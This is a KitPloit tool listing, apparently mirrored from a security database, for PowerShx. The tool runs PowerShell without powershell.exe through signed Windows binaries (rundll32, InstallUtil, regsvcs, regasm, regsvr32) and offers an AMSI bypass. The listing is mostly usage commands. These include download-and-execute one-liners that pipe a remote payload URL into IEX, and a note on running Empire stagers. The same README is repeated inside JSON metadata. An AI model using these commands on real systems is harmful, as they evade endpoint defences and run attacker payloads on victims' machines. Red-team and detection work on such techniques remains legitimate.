Search...

PowerShx - Run Powershell Without Software Restrictions

2021-10-22T20:30:00

ID KITPLOIT:7455491847654148823
Type kitploit
Reporter KitPloit
Modified 2021-10-22T20:30:00

Description

Unmanaged PowerShell execution using DLLs or a standalone executable.

Introduction

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.

Features

Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
Run Powershell without powershell.exe or powershell_ise.exe
AMSI Bypass features.
Run Powershell scripts directly from the command line or Powershell files
Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32

rundll32 PowerShx.dll,main -e                           &lt;PS script to run&gt;  
rundll32 PowerShx.dll,main -f &lt;path&gt;                    Run the script passed as argument  
rundll32 PowerShx.dll,main -f &lt;path&gt; -c &lt;PS Cmdlet&gt;     Load a script and run a PS cmdlet  
rundll32 PowerShx.dll,main -w                           Start an interactive console in a new window  
rundll32 PowerShx.dll,main -i                           Start an interactive console  
rundll32 PowerShx.dll,main -s                           Attempt to bypass AMSI  
rundll32 PowerShx.dll,main -v                           Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):

1.   
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll  
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll  
2.   
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll  
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll  
3.   
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll  
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll  
4.   
    regsvr32 /s  /u PowerShx.dll --&gt;Calls DllUnregisterServer  
    regsvr32 /s PowerShx.dll --&gt; Calls DllRegisterServer

.exe version

PowerShx.exe -i                          Start an interactive console  
PowerShx.exe -e                          &lt;PS script to run&gt;  
PowerShx.exe -f &lt;path&gt;                   Run the script passed as argument  
PowerShx.exe -f &lt;path&gt; -c &lt;PS Cmdlet&gt;    Load a script and run a PS cmdlet  
PowerShx.exe -s                          Attempt to bypass AMSI.

Embedded payloads

Payloads can be embedded by updating the data dictionary "Common.Payloads.PayloadDict" in the "Common" project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)  
{  
  // Pre-execution before user script  
  _ps.Exe(Payloads.PayloadDict["amsi"]);  
}

Examples

Run a base64 encoded script

rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Run a base64 encoded script

rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

Requirements

.NET 4

Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interractive mode and command output rely on hijacking the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.

Download PowerShx

JSON Vulners Source

Initial Source

{"id": "KITPLOIT:7455491847654148823", "bulletinFamily": "tools", "title": "PowerShx - Run Powershell Without Software Restrictions", "description": "[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEhX9hbGzB6P5Rl6fexaOhIlftUY5D182XjMC0aBE3dQr1B-6HznMejOY0n9ZOntasN2RV2GlPVFdxliuBt0cfoivz_jRhJuhFL4KDBJhlj8lp1DigCD-UaA0KkP8DM4ANjcu6zWhhM8u_COFwD6-Ej1jjUatXQ_xKiLeb0JwoSIfjitONhM1Fl3qYNZEg=w640-h344) ](<https://blogger.googleusercontent.com/img/a/AVvXsEhX9hbGzB6P5Rl6fexaOhIlftUY5D182XjMC0aBE3dQr1B-6HznMejOY0n9ZOntasN2RV2GlPVFdxliuBt0cfoivz_jRhJuhFL4KDBJhlj8lp1DigCD-UaA0KkP8DM4ANjcu6zWhhM8u_COFwD6-Ej1jjUatXQ_xKiLeb0JwoSIfjitONhM1Fl3qYNZEg=s797>)\n\n \n\n\nUnmanaged [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) execution using DLLs or a standalone executable. \n\n \n** Introduction ** \n\n\nPowerShx is a rewrite and expansion on the [ PowerShdll ](<https://github.com/p3nt4/PowerShdll> \"PowerShdll\" ) project. PowerShx provide functionalities for [ bypassing ](<https://www.kitploit.com/search/label/Bypassing> \"bypassing\" ) AMSI and running PS Cmdlets. \n\n \n\n\n** Features ** \n\n\n * Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe. \n * Run Powershell without powershell.exe or powershell_ise.exe \n * AMSI Bypass features. \n * Run Powershell scripts directly from the [ command line ](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) or Powershell files \n * Import Powershell modules and execute Powershell Cmdlets. \n \n** Usage ** \n \n** .dll version ** \n \n** rundll32 ** \n\n \n \n rundll32 PowerShx.dll,main -e <PS script to run> \n rundll32 PowerShx.dll,main -f <path> Run the script passed as argument \n rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet \n rundll32 PowerShx.dll,main -w Start an interactive console in a new window \n rundll32 PowerShx.dll,main -i Start an interactive console \n rundll32 PowerShx.dll,main -s Attempt to bypass AMSI \n rundll32 PowerShx.dll,main -v Print Execution Output to the console \n \n\n \n** Alternatives (Credit to SubTee for these techniques): ** \n\n \n \n 1. \n x86 - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll \n x64 - C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.3031964\\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll \n 2. \n x86 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe PowerShx.dll \n x64 C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe PowerShx.dll \n 3. \n x86 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U PowerShx.dll \n x64 C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U PowerShx.dll \n 4. \n regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer \n regsvr32 /s PowerShx.dll --> Calls DllRegisterServer \n \n\n \n** .exe version ** \n\n \n \n PowerShx.exe -i Start an interactive console \n PowerShx.exe -e <PS script to run> \n PowerShx.exe -f <path> Run the script passed as argument \n PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet \n PowerShx.exe -s Attempt to bypass AMSI. \n \n\n \n** Embedded payloads ** \n\n\nPayloads can be embedded by updating the data [ dictionary ](<https://www.kitploit.com/search/label/Dictionary> \"dictionary\" ) \"Common.Payloads.PayloadDict\" in the \"Common\" project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method: \n \n \n private void Handle(Options options) \n { \n // Pre-execution before user script \n _ps.Exe(Payloads.PayloadDict[\"amsi\"]); \n } \n \n\n \n** Examples ** \n \n** Run a base64 encoded script ** \n\n \n \n rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(\"BASE64\")) ^| iex \n \n PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(\"BASE64\")) ^| iex \n \n\nNote: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode \n\n \n** Run a base64 encoded script ** \n\n \n \n rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex; \n \n PowerShx.exe -e \"IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))\" \n \n\n \n** Requirements ** \n\n\n.NET 4 \n\n \n** Known Issues ** \n\n\nSome errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly. \n\nIn dll mode, interractive mode and command output rely on [ hijacking ](<https://www.kitploit.com/search/label/Hijacking> \"hijacking\" ) the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash. \n\nDue to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay. \n\n \n \n\n\n** [ Download PowerShx ](<https://github.com/iomoath/PowerShx> \"Download PowerShx\" ) **\n", "published": "2021-10-22T20:30:00", "modified": "2021-10-22T20:30:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2021/10/powershx-run-powershell-without_0539831274.html", "reporter": "KitPloit", "references": ["https://github.com/p3nt4/PowerShdll", "https://github.com/iomoath/PowerShx"], "cvelist": [], "immutableFields": [], "type": "kitploit", "lastseen": "2021-11-06T02:44:41", "edition": 9, "viewCount": 23, "enchantments": {"dependencies": {"references": [], "modified": "2021-11-06T02:44:41", "rev": 2}, "score": {"value": 0.9, "vector": "NONE", "modified": "2021-11-06T02:44:41", "rev": 2}, "vulnersScore": 0.9}, "toolHref": "https://github.com/iomoath/PowerShx", "scheme": null}